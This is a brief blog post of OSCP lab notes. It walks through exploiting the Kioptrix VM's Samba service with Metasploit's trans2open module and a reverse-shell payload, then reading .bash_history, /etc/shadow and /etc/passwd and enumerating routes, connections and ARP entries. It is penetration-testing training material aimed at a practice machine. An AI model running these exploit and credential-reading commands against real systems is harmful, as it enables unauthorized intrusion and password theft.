OSCP Security Technology - Linux Post Exploitation

OSCP Security Technology - Linux Post Exploitation

Start Metasploit.

msfconsole

Target VM: Kioptrix

Refer to Linux post exploitation cheat sheet: https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List

msfvenom -l

image-20211017075817748

Try to Exploit
search trans2open
use exploit/linux/samba/trans2open
set rhost 192.168.1.14
set payload linux/x86/meterpreter/reverse_tcp
show options
set lhost 192.168.1.22
exploit

image-20211017080750363

Failed this time, so let's try another payload type.

set payload generic/shell_reverse_tcp
show options
exploit

image-20211017081335669

cat .bash_history
cat /etc/shadow

image-20211017081833913

cat /etc/passwd

image-20211017082027006

Create shadow and passwd files in Kali.

image-20211017082530847

Route
/sbin/route

image-20211017082841107

netstart
/bin/netstat -ano

image-20211017083327240

ARP
/sbin/arp

image-20211017083608647

Try to find other interesting things...

image-20211017084101551

posted @ 2021-10-17 08:43  晨风_Eric  阅读(37)  评论(0编辑  收藏  举报